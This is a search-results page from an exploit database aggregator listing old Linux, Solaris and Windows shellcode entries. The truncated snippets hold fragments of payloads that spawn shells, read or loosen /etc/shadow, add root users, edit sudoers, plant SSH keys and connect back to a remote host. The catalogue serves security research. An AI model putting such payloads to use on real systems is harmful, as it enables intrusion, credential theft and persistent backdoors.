Lucene search
+L

3926 matches found

Exploit DB
Exploit DB
•added 2009/01/01 12:00 a.m.•38 views

Linux/x86 - /sbin/iptables -POUTPUT DROP Shellcode (60 bytes)

Linux/x86 - /sbin/iptables -POUTPUT DROP Shellcode 60 bytes. Shellcode exploit for Linuxx86 platform Name = John Babio Twitter = 3vi1john Arch = Linux/x86-32 bits Code ///sbin/iptables -POUTPUT DROPPolicy of drop to OUTPUT chain const char sc =...

7.1AI score
SaveExploits0
Exploit DB
Exploit DB
•added 2009/01/01 12:00 a.m.•61 views

Linux/x86 - execve(/bin/cat, /etc/shadow, NULL) Shellcode (42 bytes)

Linux/x86 - execve/bin/cat, /etc/shadow, NULL Shellcode 42 bytes. Shellcode exploit for Linuxx86 platform / Title: linux/x86 execve/bin/cat, /etc/shadow, NULL - 42 bytes Type: Shellcode Author: antrhacks Platform: Linux X86 / / ASSembly 31 c0 xor %eax,%eax 50 push %eax 68 2f 63 61 74 push...

7.1AI score
SaveExploits0
Exploit DB
Exploit DB
•added 2009/01/01 12:00 a.m.•28 views

Linux/x86 - execve(/bin/ash) + exit() Shellcode (34 bytes)

Linux/x86 - execve/bin/ash + exit Shellcode 34 bytes. Shellcode exploit for Linuxx86 platform / Linux x86 shellcode by bob from Dtors.net. execve/bin/ash; exit; Total = 34 bytes. / include char shellcode= "\x31\xc0\x50\x68\x2f\x61\x73\x68\x68" "\x2f\x62\x69\x6e\x89\xe3\x8d\x54\x24"...

7.1AI score
SaveExploits0
Exploit DB
Exploit DB
•added 2009/01/01 12:00 a.m.•28 views

Linux/x86 - execve(/bin/sh,0,0) Shellcode (21 bytes)

Linux/x86 - execve/bin/sh,0,0 Shellcode 21 bytes. Shellcode exploit for Linuxx86 platform / linux/x86 execve"/bin/sh",0,0 21 bytes http://www.gonullyourself.org sToRm / char shellcode = // "\x31\xc9" // xor %ecx,%ecx "\xf7\xe1" // mul %ecx "\x51" // push %ecx "\x68\x2f\x2f\x73\x68" // push...

7.1AI score
SaveExploits0
Exploit DB
Exploit DB
•added 2009/01/01 12:00 a.m.•23 views

Linux/x86 - setuid(0) + Load Kernel Module (/tmp/o.o) Shellcode (67 bytes)

Linux/x86 - setuid0 + Load Kernel Module /tmp/o.o Shellcode 67 bytes. Shellcode exploit for Linuxx86 platform / The shellcode sets uid == 0 and loads the kernel module from /tmp/o.o size = 67 bytes OS = Linux i386 written by /rootteam/dev0id rootteam.void.ru [email protected] BITS 32 jmp shor...

7.1AI score
SaveExploits0
Exploit DB
Exploit DB
•added 2009/01/01 12:00 a.m.•43 views

Windows/x86 (XP Professional SP3) (French) - calc.exe Shellcode (31 bytes)

Windows/x86 XP Professional SP3 French - calc.exe Shellcode 31 bytes. Shellcode exploit for Windowsx86 platform. Tags: Metasploit Framework MSF / | Title: Windows Xp Pro SP3 Fr calc.exe Shellcode 31 Bytes | Type: Shellcode | Author: agix | Platform: win32 / include char shellcode = "\xEB\x10" //j...

7.1AI score
SaveExploits0
Exploit DB
Exploit DB
•added 2009/01/01 12:00 a.m.•37 views

Linux/x86 - Add User (t00r/t00r) PexFnstenvSub Encoded Shellcode (116 bytes)

Linux/x86 - Add User t00r/t00r PexFnstenvSub Encoded Shellcode 116 bytes. Shellcode exploit for Linuxx86 platform unsigned char scode = "\x29\xc9\x83\xe9\xe9\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xfd" "\x96\x34\xe4\x83\xeb\xfc\xe2\xf4\xcc\x5f\xbd\x2f\x97\xd0\x6c\x29"...

7.1AI score
SaveExploits0
Exploit DB
Exploit DB
•added 2009/01/01 12:00 a.m.•30 views

Linux/x86 - execve(/bin/sh) + Using jump/call/pop Shellcode (52 bytes)

Linux/x86 - execve/bin/sh + Using jump/call/pop Shellcode 52 bytes. Shellcode exploit for Linuxx86 platform ;Description: JMP-CALL-POP execve shell 52 bytes ;Shellcode:...

7.1AI score
SaveExploits0
Exploit DB
Exploit DB
•added 2009/01/01 12:00 a.m.•25 views

Linux/x86-64 - setreuid(0,0) + execve(/bin/ash,NULL,NULL) + XOR Encoded Shellcode (85 bytes)

Linux/x86-64 - setreuid0,0 + execve/bin/ash,NULL,NULL + XOR Encoded Shellcode 85 bytes. Shellcode exploit for Linuxx86-64 platform Title: Linux x86-64 setreuid 0,0 & execve"/bin/ash",NULL,NULL + XOR encoded - 85 bytes Author: egeektronic Twitter: @egeektronic Tested on: Slackware 13.37 Thanks: Ma...

7.1AI score
SaveExploits0
Exploit DB
Exploit DB
•added 2009/01/01 12:00 a.m.•24 views

Linux/x86 - chmod(/etc/shadow, 0666) + ASCII Shellcode (443 bytes)

Linux/x86 - chmod/etc/shadow, 0666 + ASCII Shellcode 443 bytes. Shellcode exploit for Linuxx86 platform / | Title: Linux/x86 chmod/etc/shadow, 0666 ASCII Shellcode 443 Bytes | Type: Shellcode | Author: agix | Platform: Linux X86 / include char shellcode = "LLLLhHEY!X5HEY!"...

7.1AI score
SaveExploits0
Exploit DB
Exploit DB
•added 2008/12/02 12:00 a.m.•30 views

solaris/x86 setuid0, execve/bin/cat, /etc/shadow, exit0 59 bytes

solaris/x86 setuid0, execve/bin/cat, /etc/shadow, exit0 59 bytes. Shellcode exploit for solarisx86 platform / ; sm4x 2008 ; /bin/cat /etc/shadow ; 59 bytes ; SunOS sol01 5.11 snv86 i86pc i386 i86pc Solaris ; port to SunOS to pwn a b0x - thank god for that default unix CRYPTDEFAULT!!!! ; this is...

SaveExploits0
zdt
zdt
•added 2008/12/02 12:00 a.m.•23 views

solaris/x86 setuid(0), execve(//bin/sh); exit(0) NULL Free 39 bytes

Exploit for solaris/x86 platform in category shellcode =================================================================== solaris/x86 setuid0, execve//bin/sh; exit0 NULL Free 39 bytes =================================================================== / ; sm4x 2008 ; setuid0, execve'/bin/sh',...

7AI score
SaveExploits0
zdt
zdt
•added 2008/12/02 12:00 a.m.•23 views

solaris/x86 setuid(0), execve(/bin/cat, /etc/shadow), exit(0) 59 bytes

Exploit for solaris/x86 platform in category shellcode ====================================================================== solaris/x86 setuid0, execve/bin/cat, /etc/shadow, exit0 59 bytes ====================================================================== / ; sm4x 2008 ; /bin/cat /etc/shado...

7AI score
SaveExploits0
seebug.org
seebug.org
•added 2008/12/02 12:00 a.m.•27 views

solaris/x86 setuid(0) execve(/bin/cat /etc/shadow) exit(0) 59 bytes

No description provided by source. / ; sm4x 2008 ; /bin/cat /etc/shadow ; 59 bytes ; SunOS sol01 5.11 snv86 i86pc i386 i86pc Solaris ; port to SunOS to pwn a b0x - thank god for that default unix CRYPTDEFAULT!!!! ; this is what happens when ur work takes away root pirv on a SunOS box :-/ global...

7.1AI score
SaveExploits0
zdt
zdt
•added 2008/11/28 12:00 a.m.•29 views

linux/amd64 flush iptables rules shellcode 84 bytes

Exploit for linux/amd64 platform in category shellcode =================================================== linux/amd64 flush iptables rules shellcode 84 bytes =================================================== / /sbin/iptables -F shellcode for AMD64 84 bytes By gat3way The code to load the sc in...

7AI score
SaveExploits0
seebug.org
seebug.org
•added 2008/11/23 12:00 a.m.•32 views

linux/x86 connect-back port UDP/54321 live packet capture 151 bytes

No description provided by source. / linux/x86 connect-back port UDP/54321 & dup2 & fork & execve /usr/bin/tcpdump -iany -w- "port ! 54321" 151 bytes by XenoMuta | |/ / / |/ / / / | / / / / /|/ / / / / / / / / / / / / // / / / / // / // // / //|// //// //,//,/ xenomuta arroba phreaker punto...

7.1AI score
SaveExploits0
seebug.org
seebug.org
•added 2008/11/23 12:00 a.m.•24 views

linux/x86 append rsa key to /root/.ssh/authorized_keys2 295 bytes

No description provided by source. / linux/x86 shellcode to append rsa key to /root/.ssh/authorizedkeys2 keys found at http://xenomuta.tuxfamily.org/exploits/authkey/ ssh -i idrsapwn root@pwned-host 295 bytes by XenoMuta | |/ / / |/ / / / | / / / / /|/ / / / / / / / / / / / / // / / / / // / //...

7.1AI score
SaveExploits0
Exploit DB
Exploit DB
•added 2008/11/23 12:00 a.m.•31 views

linux/x86 - connect-back port UDP/54321 live packet capture 151 bytes

linux/x86 connect-back port UDP/54321 live packet capture 151 bytes. Shellcode exploit for linx86 platform / linux/x86 connect-back port UDP/54321 & dup2 & fork & execve /usr/bin/tcpdump -iany -w- "port ! 54321" 151 bytes by XenoMuta | |/ / / |/ / / / | / / / / /|/ / / / / / / / / / / / / // / /...

SaveExploits0
zdt
zdt
•added 2008/11/19 12:00 a.m.•33 views

linux/x86 edit /etc/sudoers for full access 86 bytes

Exploit for linux/x86 platform in category shellcode ==================================================== linux/x86 edit /etc/sudoers for full access 86 bytes ==================================================== / Author: Rick Email: email protected OS: Linux/x86 Description: Anyone can run sudo...

7AI score
SaveExploits0
seebug.org
seebug.org
•added 2008/11/19 12:00 a.m.•23 views

Ho' Detector (Promiscuous mode detector shellcode) 56 bytes

No description provided by source. / ▐▄∙ ▄ ▄▄▄ . ▐ ▄ ∙ ▌ ▄ ·. ▄∙ ▄▌ ▄▄▄▄▄ ▄▄▄· █▌█▌■ ▀▄.▀· ∙█▌▐█ ■ ·██ ▐███■ █■██▌ ∙██ ▐█ ▀█ ·██· ▐▀▀■▄ ▐█▐▐▌ ▄█▀▄ ▐█ ▌▐▌▐█· █▌▐█▌ ▐█.■ ▄█▀▀█ ■▐█·█▌ ▐█▄▄▌ ██▐█▌ ▐█▌.▐▌ ██ ██▌▐█▌ ▐█▄█▌ ▐█▌· ▐█ ■▐▌ ∙▀▀ ▀▀ ▀▀▀ ▀▀ █■ ▀█▄▀■ ▀▀ █■▀▀▀ ▀▀▀ ▀▀▀ ▀ ▀ Ho' Detector Promiscuous...

7.1AI score
SaveExploits0
Rows per page
Query Builder